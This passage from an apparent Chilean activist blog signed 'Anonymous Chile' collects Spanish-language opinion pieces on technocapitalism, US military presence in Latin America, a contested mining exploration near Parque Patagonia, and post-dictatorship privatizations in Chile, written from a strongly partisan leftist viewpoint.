Y … estandarizar, en este caso es repetir siempre lo mismo haciéndolo parecer siempre nuevo, dar orden a la vida humana individual y social gracias a la autorreferencialidad de la información, luego homologar y construir las identidades de los usuarios según la lógica del conformismo (digital). Es la aplicación una antigua técnica conductual que permite (quizás activando un poco de dopamina) los grandes beneficios del tecnocapitalismo de los medios, la información, la industria cultural / el entretenimiento y, la espectacularidad integrada.

Un tecnocapitalismo que conduce al máximo poder y omnipresencia, poniendo en acción las funciones específicas del capitalismo según Marx: organización, mando y vigilancia. Sin embargo, no hemos querido ver que estas funciones específicas (del capitalismo (en realidad intrínsecas de la racionalidad instrumental / calculadora-industrial) se replican hoy, “N” veces en la red como fábrica generalizada y como redes sociales generalizadas, tanto digitales como capitalistas.

Y, por tanto, la organización industrial y capitalista del trabajo, la vida, la información, las pasiones, el entretenimiento, la distracción masiva – es precisamente la fábrica que sale de la vieja fábrica y se convierte en una empresa-fábrica con todos sus departamentos de producción y consumibles especializados, pero todo “organizado” justo a tiempo y en secuencia, en forma de una fábrica integrada.

Y luego es el “orden”: con una aplicación es suficiente, solo se necesita un dispositivo para hacer / pensar / comunicarse / actuar (es decir, vivir) como indica el sistema tecnocapitalista. Y finalmente la “vigilancia y control” que también se industrializan en según explica Shoshana Zuboff, en su texto “El capitalismo de vigilancia”.

A diferencia de los medios de comunicación de hace treinta o cincuenta años ahora los medios son digitales, sin embargo, esta diferencia es solo aparente porque solo cambia la conexión / producción). Y al ser digitales los antiguos medios han abandonado el “periodismo en profundidad y la reflexión” (cómo lo lamentan el Corriere della sera o las páginas culturales de’ La República ‘) prefiriendo la simplificación, estandarización, el efecto mediático, la espectacularización y la distracción.

La nueva / vieja industria cultural

Medios que son, hoy igual que ayer, medios constitutivos de la nueva / vieja industria cultural porque el cine, la radio, la televisión de hoy son plataformas como Netflix o YouTube y junto a las redes sociales » constituyen un sistema, donde cada sector se armoniza internamente y todos se armonizan entre sí».

Ya en 1947 en “Dialéctica de la Ilustración” Max Horkheimer y Theodor Adorno Frankfurt explicaban que en el capitalismo “todo el mundo está obligado a comportarse de forma espontánea, por así decirlo, de acuerdo con el nivel que le fue asignado sobre la base de índices estadísticos (hoy gracias a perfiles algorítmicos) que guían la categoría de productos en masa que se fabricaron específicamente para cada uno. Reducidos a material estadístico, los consumidores se dividen, en las cartografías de las oficinas de investigación de mercado, que no se distinguen de las de propaganda, en grupos de ingresos, en recuadros verdes, rojos y azules”

Esta descripción de la escuela se Frankfurt es hoy uno o muchos algoritmos que aumentan el poder organizativo, de mando y control del tecno-capital en los medios y en las fábricas, pero ciertamente no tiene el mismo propósito de antaño.

Medios donde triunfan el solipsismo y el narcisismo -gracias a las nuevas tecnologías / plataformas- donde la vida no debe distinguirse de la ficción producida (producida como mercancía para ser consumida) de la industria cultural y la espectacularidad integrada: donde todos deben creerse un protagonista hoy (y no solo el espectador), mientras ha vuelto a aparecer (porque debe haber aparecido) de un espectáculo producido / industrializado por otros, donde muere la imaginación del hombre y el imaginario funcional a la autorreferencialidad del tecnocapitalismo domina. Medios que se llaman plataformas y redes sociales, pero detrás de los cuales siempre hay capital y un capitalista.

Conclusión provisional

Volviendo a la relación entre tecnología y capitalismo – con una frase de Herbert Marcuse: «la sociedad tecnológica avanzada», escribió, «tiende a tornarse totalitaria en la medida en que determina no sólo las ocupaciones, habilidades y socialmente requeridas», sino también necesidades y aspiraciones individuales. (…). La tecnología se utiliza para establecer nuevas formas de control social y cohesión social, más efectivas y agradables. (…). Da forma a todo el universo del discurso y la acción, de la cultura intelectual y material. Dentro del medio compuesto por tecnología, cultura, política y economía se funden en un sistema omnipresente que absorbe o rechaza todas las alternativas” (Hombre unidimensional). Más: “La racionalidad tecnológica se ha convertido en racionalidad política” y “las técnicas de industrialización son técnicas políticas; como tales, socavan la posibilidad de Razón y Libertad”.

Y si este proceso, descrito por Marcuse y refiriéndose a los años sesenta del siglo XX, es cierto – y lo es aún más hoy – entonces confirmamos nuestra tesis de que podemos y debemos utilizar conceptos / modelos interpretativos incluso del siglo XX. para explicar la realidad de hoy, viéndola como una evolución (y no como una ruptura / cesura / transición) del pasado.

El hecho de que toda la sociedad se haya transformado en una fábrica, que la fábrica haya salido de la fábrica gracias a las nuevas tecnologías, demuestra que la revolución industrial es un proceso largo, incesante y continuo, y que el tecnocapitalismo solo nos toma como (s) objetos cada vez más productivos y consumidores. En todo caso, la tarea de la izquierda sería comenzar a reconocer que hoy todo el mundo es un trabajador de la sociedad-fábrica en cualquier momento de su vida y que esta es sólo la última fase de un largo proceso del tecnocapitalista y, de ingeniería social que produce y reproduce incesantemente objetos productivos y consumidores con un trabajo excedente creciente, incluso si lo llama autogestión.

La tarea de la izquierda sería entonces también reconocer que esta última forma política tiene al populismo y a las tecnocracias como dos momentos políticos funcionales al totalitarismo.

Pero la tarea de la izquierda también debería ser comprender – más allá de Marx y más allá de demasiados marxismos – que un uso socialista de las máquinas es imposible si este uso está en cualquier caso predeterminado por la racionalidad instrumental / calculadora-industrial. Es decir: no basta con someter la racionalidad tecnológica a un nuevo uso; en cambio, es necesario salir – río arriba – de esta racionalidad y construir una diferente para poder imaginar un uso verdaderamente diferente (ecológico, social, humanista, consciente) de las tecnologías.

De lo contrario, se cumplirá lo que escribió Max Horkheimer (en The Transition Society): “la sociedad se transformará en un mundo totalmente administrado. (…) todo se podrá regular automáticamente (…), todo se reducirá a aprender a utilizar los mecanismos automáticos que aseguran el funcionamiento de la sociedad”.

Esta definición ya se parece demasiado a la actual sociedad informática-industrial / algorítmica. Donde, no solo vivimos usando máquinas como en el pasado (porque sin tecnologías el hombre no sobrevive), sino también vivimos integrados y dependientes de las máquinas (las máquinas nos utilizan / actúan sobre nosotros) – hecho que es la negación total de lo humano, el máximo de la delegación a las máquinas, el máximo de la alienación del hombre de sí mismo.

Ejército estadounidense en América Latina: ¿misiones de paz, espionaje o afianzando su poder militar?

Publicada el 14/08/2021 por Anonymous Chile

En América Latina y el Caribe, el ejército, la DEA, la CIA, y otras agencias de Estados Unidos, tienen innumerables bases de operaciones, instalaciones, oficinas, como acuerdos militares que les permiten operar en cualquier momento en nuestros territorios.

Si antes decían que su objetivo era combatir el comunismo, la subversión, la revolución, que desafiaba el modelo capitalista, hoy, “las nuevas amenazas” son el terrorismo, el narcotráfico, la ciber seguridad, los desastres naturales, las organizaciones criminales, y, últimamente, están preocupados hasta de la “pesca ilegal”. Bajo estas nuevas amenazas o pretextos, siguen militarizando, controlando y vigilando nuestro continente.

Chile: ¿Operaciones de paz?

En Chile, el Comando Sur del Ejército de EE.UU. financió la construcción, el 2012, en el Fuerte Aguayo, Concón, de un “Centro de Entrenamiento para Operaciones de Paz”, que muy bien calificó Alicia Lira como un centro para entrenamiento en “contrainsurgencia”. No olvidemos el papel que desempeñaron los “cascos azules”, la MINUSTAH, en Haití, donde hay acusaciones de represión, asesinatos y abusos sexuales contra la población.

“No es azaroso que aparezca esta base militar en Concón porque cuando una ciudad o un pueblo se levanta, como el caso de Aysén, y como lo han hecho los estudiantes, se plantea un esquema de contrainsurgencia. Esto sigue la lógica de la dictadura del llamado ‘enemigo interno’ y eso es lo que se está aplicando”, señaló Alicia Lira, presidenta de la Agrupación de Familiares de Ejecutados Políticos (AFEP).

A pesar de que el Ministro de Defensa, José Antonio Gómez, señalará a SOA Watch, el 2015, que este “Centro de Entrenamiento para Operaciones de Paz” se había cerrado lo cierto es que se han seguido usando sus instalaciones, que simulan una ciudad, para entrenamiento militar y que hubo y posiblemente siga existiendo presencia de marines de los EE.UU. en Chile.

A todo lo anterior, en abril del 2018 se realizaron “ejercicios”, en el Fuerte Aguayo, de tropas de EE.UU. y Chile. Se conoce también que los militares de EE.UU. compran gasolina en territorio chileno lo cual hace suponer, lógicamente, que Chile es una base militar de tránsito para el ejército americano.

Perú: El peligro de Namru-6

En Perú hay diversas bases militares de los Estados Unidos y una muy particular que es NAMRU-6, que tiene nada menos que tres instalaciones, en Lima, Iquitos y Puerto Mandonado. La “US Naval Medical Research Unit”, la Unidad de Investigación Médica Naval o NAMRU-6, tiene como objetivo investigar enfermedades infecciosas aunque sus instalaciones también podrían usarse para una eventual “guerra biológica”.

La investigadora Olga Pinheiro escribió, para la Revista El Derecho a Vivir en Paz, un artículo titulado “ABC de la Geopolítica: La Guerra Biológica” que señala que “Una de sus instalaciones – de NAMRU-6 – está ubicada, nada menos que en la Amazonía Peruana, en las cercanías del Río Amazonas, en la ciudad de Iquitos, lo que debiera ponernos en alerta delante del grave riesgo de contaminación, difusión y proliferación de agentes infecciosos”, agregando que “queda la preocupación ante la manipulación de patógenos por instituciones militares foráneas que estuvieron involucradas directamente en la elaboración de armas biológicas en diferentes períodos de la historia”.

No podemos olvidar que Cuba ha sufrido varios ataques con Armas Biológicas; entre ellos, la introducción, intencionalmente, del virus de la fiebre porcina (1971) y del dengue hemorrágico (1981). Este último ataque, ocasionó miles y miles de enfermos; 158 personas murieron, entre ellos 101 niños.

Se conoce también que NAMRU-6 abrió en los años recientes una sucursal dentro de la Base Aérea Soto Cano, en Honduras, donde opera la Fuerza de Tarea Conjunta-Bravo (FTC-Bravo) del ejérito estadounidense. Esta es, junto a la base militar de EE.UU. en Guantánamo, una de las bases militares “clásicas” donde hay tropas estadounidenses, equipamiento, radares, pistas de aterrizaje, y, obviamente, armamento.

“La FTC-Bravo lleva a cabo una variedad de misiones en Centro y Suramérica que van desde apoyar las operaciones del Gobierno de los Estados Unidos para contrarrestar el crimen organizado transnacional, a la asistencia humanitaria, apoyo en desastres naturales y el desarrollo de las capacidades de apoyo”, señala el Comando Sur.

Debemos recordar que por esta base militar y aeropuerto pasó el ex presidente Manuel Zelaya, cuando sufrió un golpe de Estado el 2009, para ser expulsado a Costa Rica. Las tropas de EE.UU. no hicieron nada entonces para detener este golpe. Ni hacen nada hoy donde – no sólo se acusa al gobierno de estar involucrado en graves violaciones a los derechos humanos- se sindica al gobierno de Juan Orlando Hernández de estar involucrado con grupos de narcotraficantes.

Agregar, que se supo, años después, el 2016, que la ex secretaria de Estado Hillary Clinton dio su apoyo al golpe de Estado en Honduras que derrocó a Manuel Zelaya, presidente elegido democráticamente.

La Escuela de las Américas sigue operando

El ex presidente panameño Jorge Illueca calificó a la Escuela de las Américas, que operó en Panamá entre los años 1946 y 1984, como “la base más grande para la desestabilización en América Latina”.

Como sabemos, la Escuela de las Américas tuvo que abandonar este país a consecuencia de los Tratados Torrijos-Carter y fue instalada, a partir de 1984, en el Fuerte Benning, en la ciudad de Columbus, en Georgia, Estados Unidos.

Desde enero del 2001, se le cambió de nombre, para engañar a la opinión pública, y desde entonces se le denomina “Instituto de Cooperación y Seguridad del Hemisferio Occidental” (WHINSEC, por sus siglas en inglés).

Es importante que todxs sepan que EE.UU. sigue dando entrenamiento a militares, policías, guardias fronterizos y civiles de toda América Latina y el Caribe, en la base militar de WHINSEC en el Fuerte Benning. Además, instructores de WHINSEC viajan por todo nuestro continente a dar entrenamiento militar.

Es importante también decir que en Estados Unidos existen más de un centenar de otras bases militares donde también tropas de América Latina y el Caribe reciben entrenamiento. Todo esto, sin considerar los cursos o asistencia que puedan estar dando la policía, el FBI, la CIA, la DEA, USAID, como otras agencias de EE.UU., a tropas militares, policiales o civiles de todo nuestro continente.

El entrenamiento, como la asistencia, es vital para lograr influir ideológicamente, políticamente, en las mentes; principalmente, en los altos mandos de las Fuerzas Armadas y policiales que tienen el monopolio de la fuerza en nuestras naciones. No fue extraño, entonces, que en el intento de golpe de Estado en Venezuela (2002), en el golpe de Estado en Honduras (2009) y de Bolivia (2019) estuvieran involucrados graduados de la Escuela de las Américas en estos hechos.

La ILEA en El Salvador

Siempre recordaremos las atrocidades de las que fue cómplice el gobierno de los Estados Unidos contra el pueblo de El Salvador. Entre ellos, recordaremos que dio entrenamiento militar, en la Escuela de las Américas, al Batallón Atlacatl, involucrado en los crímenes de El Mozote y el asesinato de los seis sacerdotes jesuitas y dos mujeres. También recordaremos el nombre de Roberto d’Aubuisson, graduado en la Escuela de las Américas, involucrado en el crimen de Monseñor Oscar Romero.

Actualmente, en El Salvador opera – lo que algunos han calificado como una nueva Escuela de las Américas- la Academia Internacional para el Cumplimiento de la Ley o International Law Enforcement Academies (ILEA, por sus siglas en inglés) donde son entrenados policías, fiscales y jueces bajo el pensamiento ideológico y los intereses que defiende los EE.UU. y la lucha contra las “nuevas amenazas”.

Lo cierto es que, en las últimas décadas, ha surgido, como arma de combate, la guerra jurídica, el “Lawfare”, la criminalización y judicialización de dirigentes y líderes sociales. Si no son asesinados o desaparecidos, son estigmatizados, desprestigiados, llevados a juicios. Muchos líderes y lideresas, incluso, corren el peligro de ser encarcelados y vivir la prisión política.

La tarde del 10 de diciembre de 1981 la tranquilidad del pequeño poblado de El Mozote ubicado al norte de El Salvador, cerca de la frontera con Honduras, habría de esfumarse para siempre. El batallón Atlácatl, un grupo del ejército salvadoreño encargado de poner fin a la guerrilla y formado en la tristemente célebre Escuela de las Américas, conocida como el semillero de militares que inauguraron las dictaduras más sangrientas de América Latina, irrumpió en el poblado.

Espectro Completo

A todo lo que ya sabemos sobre la presencia de EE.UU. en América Latina y el Caribe, con una fuerte presencia en Colombia, Panamá, y otras naciones, el reciente acuerdo para el uso del Centro de Lanzamiento Aeroespacial de Alcântara en Brasil; el uso de la Islas Galápagos, en Ecuador, por parte del ejército de EE.UU.; son antecedentes nuevos sobre la continuas formas de militarización que el imperialismo estadounidense sigue desarrollando en nuestro continente para mantener su hegemonía.

Al terminar este texto es importante recordar que Rina Bertaccini – quien fuera presidenta del Movimiento por la Paz, la Soberanía y la Solidaridad entre los Pueblos de Argentina (MOPASSOL) y vicepresidenta del Consejo Mundial por la paz – denunció el 2011, en el «V Encontro Nacional da Associação Brasileira de Estudos de Defesa» (ENABED), el contenido del documento “Joint Vision 2020” (Visión conjunta 2020) del Ejército de EE.UU. donde se señala que hoy la dominación es concebida de “espectro completo”.

“Con toda crudeza nos están advirtiendo qué podemos esperar de las guerras imperialistas del siglo XXI: una acción global desplegada en todos los dominios: el específicamente militar con su poder letal, pero también en el plano político, económico, ideológico y cultural, sin limitación o condicionamiento jurídico o moral de ninguna clase”, señaló entonces Bertaccini.

Preocupación en Aysen por proyecto minero

Publicada el 14/08/2021 por Anonymous Chile

Preocupa en la región la posibilidad de reinicio de faenas de exploración del proyecto «Los Domos», de la sociedad minera Southern Gold perteneciente a la australiana Equus Mining.

Toda nueva prospección minera de proyecto “Los Domos” aledaño a Parque Patagonia debe ingresar al SEIA. Sin embargo, hasta el momento, tanto la Superintendencia del Medio Ambiente como Sernageomin y el Servicio de Evaluación Ambiental mantienen sus pronunciamientos del año 2019: proyecto no puede avanzar sin someterse a evaluación ambiental.

Inquietud ha generado entre parte de la comunidad de Chile Chico y la región de Aysén la posibilidad de reactivación del proyecto de exploración minera “Los Domos”, de la sociedad Southern Gold perteneciente a la australiana Equus Mining. Esto, producto del movimiento de maquinaria pesada hacia El Ceballos, área aledaña al sector Jeinimeni de Parque Nacional Patagonia.

Esta posibilidad contradeciría lo establecido por diversos servicios públicos, que ya a principios de 2019 determinaron que Equus Mining había ejecutado 20 plataformas de prospección en la zona de Quebrada Honda, por lo cual debió someter sus operaciones al Sistema de Evaluación de Impacto Ambiental (SEIA). La Ley de Bases del Medio Ambiente estipula que en Aysén se puede desarrollar hasta un máximo de 19 plataformas de exploración sin evaluación ambiental, lo que según los organismos fue vulnerado por la compañía.

Lo anterior fue consignado por la propia Superintendencia de Medio Ambiente (SMA) que en un Informe Técnico de Fiscalización Ambiental de febrero de 2019 señala que luego de realizar una visita a terreno “se puede constatar que el proyecto de prospección minera Los Domos, de la empresa Southern Gold SpA, en consideración a haber ejecutado 20 plataformas de prospección minera en Región de Aysén, debe ingresar al Sistema de Evaluación de Impacto Ambiental”.

A esto se sumaron las declaraciones del director de Sernageomin, Alfredo Domeyko, ante la Comisión de Medio Ambiente del Senado, explicando que en febrero de ese año el organismo rechazó la solicitud de Southern Gold de desarrollar más prospecciones el sector Jeinimeni sin someterse a evaluación ambiental.

Varios meses antes, en noviembre de 2018, la Corporación Privada para el Desarrollo de Aysén, la Corporación Costa Carrera y la Agrupación Aisén Reserva de Vida habían ya interpuesto ante la SMA una denuncia apuntando a que las faenas de exploración de “Los Domos” habían sido ejecutadas “con seria e intolerable vulneración de la normativa ambiental”, tanto por no ingresar a evaluación siendo que se ubicaban dentro del Sitio Prioritario para la Conservación de la Biodiversidad Estepa Jeinimeni-Lagunas de Bahía Jara como por impactar cursos hídricos de la zona, entre otros aspectos.

Fueron estos antecedentes los que llevaron al organismo fiscalizador a iniciar en diciembre de 2018 el proceso de inspectivo. El 27 de noviembre de 2019, mediante ordinario 191307, el SEA no solo determinó que el proyecto “Los Domos” debió ingresar al Sistema de Evaluación de Impacto Ambiental por ser un proyecto minero y superar las 19 plataformas en la región de Aysén, sino por estar en un área bajo protección oficial como es el Sitio Prioritario para la Conservación de la Biodiversidad Estepa Jeinimeni-Lagunas de Bahía Jara, lo cual desde noviembre de 2018 han sostenido CODESA, COSTA CARRERA y Aisén Reserva de Vida.

El servicio concluyó que la solicitud de realizar más exploraciones mineras en el área por parte de Southern Gold “debe ingresar en forma previa y obligatoria al Sistema de Evaluación de Impacto Ambiental”. Esto, a fin de cuentas, fue un logro de las organizaciones regionales tras sus denuncias y acciones administrativas y legales.

Hoy por hoy, luego que la empresa hiciera sus descargos, el Superintendente del Medio Ambiente, Cristóbal de la Maza, solicitó nuevamente al director del Servicio de Evaluación Ambiental, Hernán Brücher, un pronunciamiento sobre el mismo punto, siendo el último requerimiento en octubre de 2020. A la fecha aún no se recibe respuesta, por lo cual hasta hoy se mantiene la interpretación vigente.

Fast track para la minería

En julio de 2019 el consultor de Southern Gold, Alejandro Segura, sostuvo una reunión con dirigentes de Chile Chico, señalando que se encontraban en pleno proceso de elaboración de una declaración de impacto ambiental para ejecutar un proyecto de prospección que duraría 4 años y tendría un costo total de 7,5 millones de dólares, contemplando la operación de 85 plataformas de sondaje con 35 personas contratadas. Sin embargo, hasta el momento nada se ha sabido de aquello.

En la ocasión incluso aseguró que “aquí hay personajes que estuvieron ese día cuando vino la gente de la Superintendencia de Medio Ambiente, el senador Sandoval y el seremi de Bienes Nacionales, Gabriel Pérez. Ahí ellos se comprometieron a aprobar esta declaración de impacto ambiental en dos meses. Eso fue a lo que se comprometieron”.

La información sobre posibles nuevas prospecciones en el área de “Los Domos” originó que desde las organizaciones socioambientales de la región se ingresaran solicitudes de transparencia ante Sernageomin y Bienes Nacionales relativas a posible reinicio ilegal de faenas.

Imagen Google Earth: En esta es posible ver cómo las prospecciones de Equus Mining en «Los Domos» ya han impactado el área con kilómetros de construcción de caminos, sin evaluación ambiental.

Chile, la alegría ya viene: Ahora un objeto de negocio para las transnacionales y monopolios extranjeros

Publicada el 14/08/2021 por Anonymous Chile

En el caso de Chile, el modelo actual se impuso a sangre y fuego. Y lo que esta vez necesitamos explicar tiene que ver con la aplicación y vigencia de este modelo económico y con la hegemonía de la Burguesía Monopólico Financiera.

“En consecuencia, las denuncias políticas son, ya de por sí, uno de los medios más potentes para disgregar las filas enemigas, para apartar del adversario a sus aliados fortuitos o temporales y sembrar la hostilidad y la desconfianza entre quienes participan de continuo en el poder autocrático.” (Lenin: ¿Qué Hacer?)

No debemos nunca, jamás, perder nuestra capacidad de asombro. Una cosa es percibir la realidad tal como es, aceptar sus condiciones materiales concretas, y otra es interpretar arbitraria o antojadizamente su sentido. Cuando ocurre esto último, nos estamos enfrentando entonces, a la mentira y a la manipulación de la realidad. Lo que debe preocuparnos de todo esto, es que la maquinaria ideológica del sistema, la mentira y la manipulación la ha convertido en una normalidad, al punto que un porcentaje significativo de la opinión pública, no sabe que es cierto y que es falso. Se da tan recurrentemente este ejercicio en los medios de comunicación, cuestión que por lo demás es consciente y dirigida, que se instala para el conjunto de la sociedad una visión de un origen caprichoso, inicuo, unilateral y contrario al derecho de las personas a ser informadas de forma oportuna y veraz, terminando por imponer la mentira y la falacia como verdad histórica.

Sin embargo, el cómo se miran los hechos, es una parte de un todo mucho más complejo, y que se hace necesario desentrañar para ganar un juicio, no solamente coherente con lo que de verdad ocurre o sucede, sino por el compromiso que subyace en nuestros principios y valores de clase. El hecho de debernos a los intereses históricos de los explotados y oprimidos, nos urge atender la realidad con esa conciencia crítica a la cual siempre hemos apelado como la condición de partida de lo que somos y queremos para la humanidad. Este ojo crítico, lo hemos dispuesto precisamente, para, reivindicando la verdad, tengamos la fuerza de la razón en el combate a lo injusto, a lo arbitrario, a lo despótico. Lo que debemos hacer, es develar lo que hay de fondo, en todas estas tácticas, planes y estratagemas con la que la clase dominante y la elite política que la secunda, hacen la política, hacen los negocios y además organizan el control político y social y por supuesto la represión.

El capitalismo siempre se actualiza mediante las formas de dominación, o sea, operando la relación capital/trabajo con un nuevo patrón de acumulación. Ahora, la instalación de un nuevo modelo económico, no deriva necesariamente de un nuevo pacto social. En el caso de Chile, el modelo actual se impuso a sangre y fuego. Y lo que esta vez necesitamos explicar tiene que ver con la aplicación y vigencia de este modelo económico y con la hegemonía de la Burguesía Monopólico Financiera. Algunos intelectuales hablan de Oligarquía (gobierno de unos pocos) y ocupan este concepto para explicar el poder sin contrapeso que posee una de las fracciones de la clase dominante por sobre el resto de fracciones y sectores de la burguesía. En el caso de nuestro país, es necesario señalar, que es a partir de la imposición de este modelo llamado “neoliberal”, acepción que no compartimos, se constituyen en Chile los grupos económicos, eufemismo usado en dictadura para no hablar de entidades monopólicas. El surgimiento de esta fracción burguesa, facilita el paso del capitalismo nacional a una fase monopólico financiera y a partir de allí, se inaugura una nueva etapa del desarrollo capitalista en Chile. El Ideario de esta nueva etapa, está contenido en el acto de Chacarillas donde se da a conocer por el dictador de entonces (hoy tenemos otro) las siete modernizaciones del Estado y que, en estricto rigor, se correspondían con siete grandes contrarreformas que daban inicio, en términos concretos, a la contrarrevolución de la burguesía moderna. Este hito político, pero con una plataforma económica bien definida, da por terminado el viejo pacto social y cancela de forma definitiva el Estado de Bienestar o Benefactor. Sergio Cauas, nombrado ministro plenipotenciario de Economía y de Hacienda al mismo tiempo, encabeza el desmantelamiento del viejo modelo de Sustitución de Importaciones y da comienzo a la implementación de lo que la dictadura llamo “la Economía Social de Mercado” acompañado de una irrebatible política de shock.

Chile: Botín de guerra de los militares y propiead privada de los monopolios

Lo que desde el 18 de octubre de 2019 nos ha tocado vivir, es la firme pero desacreditada resistencia del bloque en el poder, a las diferentes expresiones de odio y descontento, que ha causado desde su aplicación el actual modelo económico, descontento que ya generalizado irrumpe como un levantamiento popular, que logra poner en jaque al sistema. Sin embargo, de esta prolongada y negativa experiencia de los sectores obreros y populares, sumados además los sectores medios, que ha contado con todos los ingredientes mediante los cuales se han traducido los efectos económicos, sociales y políticos, los gobiernos concertacionistas y de Chile Vamos, a contrapelo de todas la quejas, de todos los reclamos y de todas las movilizaciones y protestas, han sostenido el rumbo antipopular y reaccionario de los planes y agendas gubernamentales en una estrecha complicidad con los otros poderes del Estado, complicidad que hoy ha quedado en una ya descarada evidencia.

El bloque en el poder, ha caminado por más de 30 años, por un lujoso y alfombrado pasillo de consensos y negociados, ha sido la alfombra roja de la ostentación y al mismo tiempo de la impunidad con que han realizado todas sus fechorías. En los espacios del poder político que ocupan, han quedado social y culturalmente condicionados por una escabrosa trama de vínculos y asociaciones, que les hacen sentirse cómodos y como pisando en terreno propio. Esta autopercepción de las condiciones de privilegio, han determinado que el cúmulo enorme de insatisfacciones que han creado en el mundo obrero y popular, simplemente no motiven su atención y preocupación. Entonces, la constatación histórica que debemos confirmar, es que la dictadura civil-militar, no fue derrocada, fue invitada a dejar sus funciones. Es decir, lo que en 1973 se tomó por asalto, en los años 90 se continuó conservando como el botín de guerra de las fuerzas armadas y policiales y el resto que no era poco, lo convirtieron en patrimonios privados de los monopolios. La famosa transición no fue otro momento, que la administración política de lo podría llamar la repartija del Chile, un país completo que la clase dominante puso en el mercado de valores y con orden de remate.

Durante los gobiernos de la Concertación, la privatización tuvo un nuevo impulso, y esta nueva etapa, estimuló la acumulación en conglomerados que ya habían tenido su despegue en años anteriores. El proceso privatizador encontró su canalización en una serie de holdings, donde se agrupan empresas dedicadas a este lucrativo negocio que, completado ya en Chile, empezó a expandir sus posiciones a otros países de América Latina, asociados con empresas regionales o en megafusiones con las transnacionales.

Durante el gobierno de Patricio Aylwin (1990-1994), se realizaron dos operaciones: entre 1991 y 1993 se traspasó el 48% de las acciones que el Estado tenía en la empresa Zofri S.A. por un monto de 23,9 millones de dólares. En 1993 se suscribió un contrato de gestión con la empresa Aguas Quinta, integrada por Chilquinta y Aguas de Barcelona, para realizar inversiones en la sanitaria Esval.

La mayor ofensiva de privatizaciones y que podríamos llamar la tercera ola privatizadora, se dio con el gobierno de Eduardo Frei Ruiz-Tagle (1994-2000), bajo cuyo mandato se incorporaron capitales privados nacionales y extranjeros a importantes empresas fiscales. Entre estas destacan, en 1994, la venta del 51% de las acciones de El Abra Koper Mine, por un valor de 330 millones de dólares a las compañías Cyprus Minerals Co. (EE.UU.) y a la canadiense Lao Minerals. Ese mismo año por su participación en cuatro empresas (Fepasa, Colbún, Línea Aérea Nacional y Essal) el Fisco recibió la suma de 116,2 millones de dólares. Igualmente se vendieron el 30% de las acciones estatales en la eléctrica Edelnor, en 84,4 millones de dólares a Southern Electric Chile S.A.

El proceso de privatización prosiguió, en 1995, con la venta del 95% de las acciones de Empremar por la suma de 4,5 millones de dólares a Salinas Punta de Lobos S.A., y el 18% de Minsal S.A. que fue traspasado en 7,1 millones de dólares a Soquimich. Durante 1996 se realizó una nueva venta de acciones de Colbún, que esta vez abarcó al 37,5% de ellas, por el monto de 340 millones de dólares a tres holdings privados: el grupo Matte, el grupo belga Tractebel y el grupo español Iberdrola.

En 1998 comenzó el turno de las sanitarias, entre las cuales estuvieron Esval S.A. y Edelaysen S.A. El 40% de las acciones fiscales de Esval fue traspasado en 138 millones de dólares a Enersis y la compañía inglesa Anglian Water. Al siguiente año se realizó la mayor de las transacciones: el traspaso del 42% de Emos S.A. en la suma de 959,6 millones de dólares a las empresas Suez Lyonnaisse des Eaux (Francia) y Aguas de Barcelona (España). Asimismo, el 51% de Essal S.A. fue vendido en 93,6 millones de dólares a la española Iberdrola Energía. Luego, ante su gabinete, Frei destacaba los proyecto de ley que modificaba Emporchi transformándola en diez empresas autónomas, cuya explotación sería licitada a privados. De esta forma su gobierno estaba ajustando su política a las orientaciones del FMI y del Banco Mundial, acción que obviamente suscitó amplio apoyo en los empresarios. En contraste, el gobierno impuso después de acuerdos con los patrones, un salario mínimo de US $ 142 mensuales, que se aplicó a 500 mil trabajadores. En la mira quedó la salud pública, la educación superior, modificar la ley de fondos de pensiones e Isapres, las reformas laborales y previsionales y como gran bocado Codelco y la Enap.

Después la política de privatización definida por los asesores de Lagos, fue esbozada de manera cautelosa, bajo el criterio que en esta materia no hay dogmas. Sin embargo, lo sustancial de la política de aquel gobierno, fue mantener el itinerario de la incorporación de privados, la internacionalización de Codelco (asociación con capitales extranjeros) y la conversión de Enap en sociedad anónima. Por lo mismo, el asunto cobró vigencia cuando en septiembre del 2000 se traspasa a privados el 42% de la empresa sanitaria Essbío, cuya venta se concretó en 282,3 millones de dólares. Concretadas estas enajenaciones del patrimonio nacional, Lagos se comprometió a hacer un exhaustivo análisis con el objeto de revisar las fortalezas y debilidades del proceso privatizador.

Estos fueron en ese periodo los programas y planes económicos, estrategias y agendas orientadoras de las maniobras que los grupos monopólicos y sus lacayos de turno diseñaron para enfrentar el cuadro crítico de la economía mundial, y que obviamente, no dieron ni hoy están dando los resultados de crecimiento que la clase dominante en su conjunto esperaba. Los equilibrios macro-económicos se tornaron cada vez más inestables y, los índices macro-económicos comenzaron su descenso. Los turnos de las gestiones posteriores con Bachellet y el hoy dictador Piñera, no hicieron más que profundizar la crisis y acercarnos a las actuales circunstancias.

Hoy con pandemia y políticas recurrentes de improvisación, la economía del país se encuentra prácticamente estancada. El capitalismo en general se encuentra en una frágil posición y Chile en particular, experimenta uno de los momentos más agobiantes de su historia, con un proceso abierto y latente de odio, descontento y rebeldía social, contenida por un lado por la crisis sanitaria y por otro, por las medidas represivas que el gobierno está implementando con la expresa complicidad de la elite política y los otros poderes del Estado.

Afirmamos que los activos políticos y sociales, saben bien lo que está ocurriendo en cuanto a las contradicciones de clase, no negamos, que en esta franja movilizada y que está dando cuenta sin descanso de este antagonismo, se enfrente al régimen o al gobierno, teniendo visiones políticas diferentes, lo cual hace que se mantengan los fenómenos de dispersión ideológicas y la lamentable atomización de las orgánicas en pie de lucha. Esto da cuenta de un manifiesto arrastre por años, de un evidente atraso en los niveles de conciencia, un atraso que nos ha impedido realizar una adecuada y rigurosa lectura de la realidad, que nos posibilite un juicio más certero de los hechos. Atraso que nos ha colocado a la zaga de los acontecimientos, con una concepción de vanguardia (Primera Línea), valorable sin duda, pero que no excede el voluntarismo y un corto placismo político. Un atraso que desecha la oportunidad de vínculos en pro de la unidad de clases por sesgos sectarios o afanes mezquinos de protagonismo, propios de una desviación pequeño-burguesa. Este Chile popular que nos levantamos ese 18 de octubre del 2019, conectado emocionalmente por los lazos del odio y del descontento social, no fuimos capaces de entender que nos levantábamos contra una poderosa estructura, contra una mole orgánica, jerárquica y disciplinada y que respondió como un solo cuerpo frente a la amenaza que significó nuestra rebelión. Un atraso en la conciencia social y política que no nos dio la capacidad de construir unidad, organización y espíritu de clase. Un atraso en la conciencia que nos negó la decisión de ponernos a la altura de un enorme desafió histórico: Vertebrar la movilización obrera y popular en el contenido y en la forma.

